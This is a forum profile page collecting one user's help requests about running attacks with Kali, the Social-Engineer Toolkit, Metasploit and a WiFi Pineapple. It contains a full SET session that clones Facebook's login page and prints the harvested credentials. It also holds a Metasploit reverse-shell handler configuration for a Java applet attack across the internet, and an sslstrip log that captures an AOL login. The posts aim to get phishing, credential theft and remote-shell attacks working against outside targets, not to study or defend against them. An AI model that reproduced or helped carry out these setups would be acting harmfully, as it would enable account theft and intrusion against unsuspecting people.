Jump to content

littlemule

Active Members
  • Posts

    31
  • Joined

  • Last visited

Everything posted by littlemule

  1. Your right it is a bit of a piss poor effort, must have been tired that night, ill run it again and will get back with more detail, Never seem to have this many problems with back track, is it worth going back to it?
  2. Keep getting the same problem, when i do the attack on my network, you can see the username and password, but when i do it over the internet i get what ive shown above in previous post, When i do the atttack over the internet everything works fine until the username and password is sent through to my computer and as you can see its just a jumble of letters and numbers. Can anybody help? Cheers
  3. I get that bit, its the Signed_Update.jar.orig i dont understand, and not sure how to sort it
  4. im getting this message when i run this attack, anybody any ideas on how to sort it out. cheers [!] Something went wrong, printing the error: [Errno 2] No such file or directory: 'src/html/Signed_Update.jar.orig'
  5. If i changed my router for a different one would that make a difference? if not how do i get round it. Could you also tell me how to update java the best way or the best way to update set. Regards
  6. Its the top half of the field, were it says POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}] It doesnt show the user or password, but if you look at the bottom half it will show the username and password only if i use the windows explorer and not google chrome
  7. As soon as i start to type in the email address and password on the facebook page thats what it kicks out everytime?????????????
  8. Can anybody help me with this, this attack has always work fine in the past when ive used it, but now its doing this when i use google chrome, when i used the windows explorer then everthing seems fine,,,,, Thanks 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Create or import a CodeSigning Certificate 99) Return to Main Menu set:webattack>3 The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack. The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone. The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality. 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.73 [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:http://www.facebook.com [*] Cloning the website: https://login.facebook.com/login.php [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: 192.168.1.67 - - [04/Feb/2015 23:24:03] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=1 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: miny_encode_ms=3 PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=Miny1~95~,"~,~","~":~0~.~":"~null~],["~login~",{"~php~323xo~",~click~":[~1423090709517~time_spent~ft~posts~":[["~time_spent_bit_array~tos_id~start_time~tos_array~","/~],"~tos_len~tos_seq~tos_cum~},~click_ref_logger~",["~981~act~1~","-","~r~","/",{"~user~":{},"~gt~":{}},~"],~script_path_change~source_path~":"/~source_token~ad976420~dest_path~dest_token~navigation~impression_id~cause~"},~1423090709533~ods~:~ms~page_id~qa~www~x0o534~1423092247919~568~2~1423090706224~15~559~237~unload~0v29~[{"~]],"~trigger~7~4~11~1423090706~1423090698~9~"},{"~325~b279a230~load~1423092244800~0vL8~253~1423092247915~email~bits~js_initialized~]},~1423092247925~]]}]~2E1DCAy1XCIyPQRGSCIyTz2LwUL2TxAWXz2MwYzAwZz2H-2yxAE_1w2DJMw1yJMx2xwFyKyK1A1B1CO1E1F1G2wx2OxAx1xwIVFBH1HMxAE1IG1J1KFBHy1LC1My1NzDw1OzDw1PzDw1QzDw1RC2C1S1TxAERGSCIyTz2KwUL2zxAWXz2IwYz1zwZz2J-1TxA2F2GC1U1V1WBNB1YB1Z2N1DCAy1XC1-yPQ1IG1JzDw1LzDw1N1KFBHy1OC1My1PzDw1QC2Py1RC2Q1S2RxAE_1w2SJ1_w1yJ2UxAw2VyKyK1A1B1CO1E1F1G2Ax2BxAx1xw1-VFBH1H1_xAE1U1V1WBNB1YB1ZGNB2WB2XL1z2Y2ZxA2- PARAM: ts=1423092247933 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=2 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}] PARAM: ts=1423092252940 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. 192.168.1.67 - - [04/Feb/2015 23:24:26] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=1 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","navigation":null,"impression_id":"b279a230","cause":"load"},1423092268014,0],["click_ref_logger",["0vL8",1423092271140,"act",1423092271139,0,"email","click","click","-","r","/",{"ft":{},"gt":{}},562,238,0,981,"p4l5eo","/login.php"],1423092271140,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1423092271161,0]],"trigger":"ods:ms.time_spent.qa.www"}] PARAM: ts=1423092271180 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=2 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["time_spent_bit_array",{"tos_id":"p4l5eo","start_time":1423092268,"tos_array":[135,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092276055,0]],"trigger":"time_spent_bit_array"}] PARAM: ts=1423092276071 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: lsd=AVqA1uQz PARAM: display= PARAM: enable_profile_selector= PARAM: legacy_return=1 PARAM: profile_selector_ids= PARAM: trynum=1 PARAM: timezone=0 PARAM: lgnrnd=152349_xc4V PARAM: lgnjs=1423092268 POSSIBLE USERNAME FIELD FOUND: email=qwerty POSSIBLE PASSWORD FIELD FOUND: pass=12345 PARAM: default_persistent=0 PARAM: qsstamp=W1tbMTUsMjUsMzAsNDEsNDUsNTUsNzIsNzMsNzcsODksMTIxLDEyMywxNDUsMTk5LDIwMSwyMDgsMjE5LDIyNSwyNDIsMjYxLDI2MywyNjksMzAxLDMwNSwzMDgsMzIyLDM0NiwzOTYsNDI3LDQ0MSw0NjAsNDYzLDQ3Niw0ODAsNTEwLDUyMyw1NDEsNTUyLDU1NSw1NzMsNjI2LDcwM11dLCJBWmx2Vk94aC1GeUxtOXQ1RW81Y01aNjQtY0JmcEJwTGtIV3VXSXVtYlE5NG9FYTB3Tmt2SXZMeW5IRFZQcnlKQ0hhN0xWbUF5Z0FHY1pac1BXUDBFNUktVGNUeEk4WDNKajRLdk43dzNPSXh1dXdubDFhVDI0RTZ2MjVCRjZqRUdickJqV3pIWERFaURuVVVBRWxYSV9xckx0RnNTR3QtTmVwdmpZblpUQURCdkQzM2dXNW9kS0ducHEwd1pDQ2lvcm9VRDVCS1RCMERWRm5TNXlYVlhOTE5fVC1YY2ZacmVHNGhDX25VYzFaOTlRIl0= [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
  9. Need to correct the last line ( i did have it running with the last ISP due to having freedom with my ports)
  10. Been having alot of trouble lately, moved over to a new ISP for the last few weeks. And after hours of trying can only port forward port 8081 and 443. So what can i do if i cant port forward 4444 as i have only just found out that there is a total block on this one. My use of metasploit is pretty basic but didnt have this running over the internet with my last ISP.
  11. Thanks for that, very helpfull.
  12. Thanks for the reply, but im still having trouble with this, When i turn off the firewall on my vista box its showing that port 443 is open. When i assigned the same local ip to my kali box, even when i use firestarter or Gufw its showing that the port is closed. Not got a clue with this one,,,, Anybody else having this trouble?
  13. just for one boot, so i can turn it on and off as i like, Pretty new to all this so not realy sure if im doing this right, Found this topic, For Linux such as Debian / Ubuntu / Suse Linux etc, type following commands(as root). First save firewall rules: # iptables-save > /root/firewall.rules or # sudo iptables-save > /root/firewall.rules Second type the following commands : # iptables -X # iptables -t nat -F # iptables -t nat -X # iptables -t mangle -F # iptables -t mangle -X # iptables -P INPUT ACCEPT # iptables -P FORWARD ACCEPT # iptables -P OUTPUT ACCEPT But when i check online to see if the port is open, it always shows as closed on my kali linux box, were am i going wrong? Cheers
  14. Hi, Ive port forwarded port 433 on my router, this has work fine as i have checked it with my vista box. Only when i turn my firewall off in vista that it will show as open. So when i assign thiskali's internal ip to this open port it still shows as closed. Found a tool called GUFW, gave this a go but still had no luck. Does anybody know have to turn off the firewall in kali? Cheers
  15. Hi, Can anybody help me out with this problem, Its the java applet attack over the internet. Ive port forworded 80,8081,443 and check online to see if they are open, which they are. I used to have this attack working on backtrack 5 r3 but now i am using kali linux installed to the hdd and its coming up with lots of errors, [*] Processing /root/.set/meta_config for ERB directives. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set EnableStageEncoding 22 EnableStageEncoding => 22 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set EnableStageEncoding 53 EnableStageEncoding => 53 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set EnableStageEncoding 443 EnableStageEncoding => 443 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set EnableStageEncoding 21 EnableStageEncoding => 21 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set EnableStageEncoding 25 EnableStageEncoding => 25 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set EnableStageEncoding 8081 EnableStageEncoding => 8081 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set EnableStageEncoding 80 EnableStageEncoding => 80 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 86.149.xxx.xx LHOST => 86.149.xxx.xx resource (/root/.set/meta_config)> set LPORT 443 LPORT => 443 resource (/root/.set/meta_config)> set EnableStageEncoding false EnableStageEncoding => false resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> exploit -j [*] Exploit running as background job. msf exploit(handler) > [-] Handler failed to bind to 86.149.xxx.xx:443 [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler... 86.149.xxx.xx - - [24/Jan/2014 23:21:20] "GET / HTTP/1.1" 200 - 86.149.xxx.xx - - [24/Jan/2014 23:21:31] code 404, message File not found 86.149.xxx.xx - - [24/Jan/2014 23:21:31] "POST /ajax/bz HTTP/1.1" 404 - 86.149.xxx.xx - - [24/Jan/2014 23:22:33] code 404, message File not found 86.149.xxx.xx - - [24/Jan/2014 23:22:33] "POST /ajax/bz HTTP/1.1" 404 - ---------------------------------------- Exception happened during processing of request from ('86.149.xxx.xx', 50631) Traceback (most recent call last): File "/usr/lib/python2.7/SocketServer.py", line 295, in _handle_request_noblock self.process_request(request, client_address) File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request self.finish_request(request, client_address) File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request self.RequestHandlerClass(request, client_address, self) File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__ self.finish() File "/usr/lib/python2.7/SocketServer.py", line 704, in finish self.wfile.flush() File "/usr/lib/python2.7/socket.py", line 303, in flush self._sock.sendall(view[write_offset:write_offset+buffer_size]) error: [Errno 32] Broken pipe ---------------------------------------- Im thinking its somthing in the config file thats not setup right. Cheers littlemule
  16. i already did that before posting on the forum,,,,just done it again and now the damn thing worked,,,,,,,,,,get stuff thanks again Ninja
  17. Not sure what im doing wrong here,Ive just install the latest firmware V2.7.0, ive installed the random roll to my usb ,but when i come to run it im getting this,,,,, Random Roll Set-up 1. Landing Page: index.php Enable Warning: file_get_contents(/www/pineapple/config/spoofhost) [function.file-get-contents]: failed to open stream: No such file or directory in /usb/modules/RandomRoll/randomroll.php on line 390 2. Spoof Host: 172.16.42.1 * Enable 3. SymLink: /www/randomroll/ Enable 4. DNSSpoof Not Running Start         Install | Un-Install AutoStart Disabled | Enable       Random Roll Log (Refresh) logs/RandomRoll.log Now i sym link the usb on the 2.4.1 version and just upgraded to the newest version with the usb install,not sure if this has anything to do with it....But the random roll worked a dream on the old version and it was installed on my usb. Any help will do at the minute cos i havnt got a clue.
  18. hi Just wondered how hard it would be to make a saxrolled instead of rick, never done it so i would no were to start....
  19. Thanks for that, i see were i went wrong, the little tip you gave me about it been at the end sorted it out for me, must have had my eyes shut at the time. It all seems to be working great, so ill put a log file up just so it can be checked out. Thanks Again job complete i hope. sslstrip output_1348433847.log [september 23 2012 20:59:11] 2012-09-23 20:59:11,018 SECURE POST Data (my.screenname.aol.com): sitedomain=sns.webmail.aol.com&siteId=〈=en&locale=gb&authLev=0&siteState=ver%253A4%257Crt%253ASTANDARD%257Cat%253ASNS%257Cld%253Amail.aol.co.uk%257Cuv%253AAOL%257Clc%253Aen-gb%257Cmt%253AANGELIA%257Csnt%253AScreenName%257Csid%253Aaf67609b-41dc-493b-8b08-b6dc347d92e8&isSiteStateEncoded=true&mcState=initialized&uitype=std&use_aam=0&offerId=webmail-en-gb&seamless=novl&regPromoCode=&usrd=8279360&doSSL=&redirType=&xchk=false&tab=&lsoDP=id%3D2FDD2BB0-110C-6250-2659-2358FAAD9E05&loginId=qwerty&password=123456
  20. Hi Trying to run armitage when ive got my pineapple up and running i get this Could not connect to database click help button for troubleshooting help. FATAL:: no pg_hba.conf entry for host "172.16.42.42", user "msf3", database "msf3dev "its says click the help button but theres not one there to click, any help will do at this point. Thanks
  21. Its seems to be logging somthing, ive tried a few websites ans put user names and password in on them but dont seem to be seeing the user/password on the log file. when using sslstrip, should i just have this running only. or would anybody recomend using ettercap on the pineapple. Thanks
  22. Hi can anybody tell me how i read my output log on sslstrip, its says save them to usb which ive also tried but not sure how i get to read them once they are on there, thanks
  23. totaly agree with you,,,,I already went and tried that and it seems to work ok,,,,,but thanks for the reply,,,,always nice to have a bit of guidence
  24. Got it sorted, ment to post this b4 now. Just one thing , when i copy new files to my usb,should i sym link the usb with the wifi pineapple again or should you reboot the machine????????? not sure which is the right way. Thanks
×
×
  • Create New...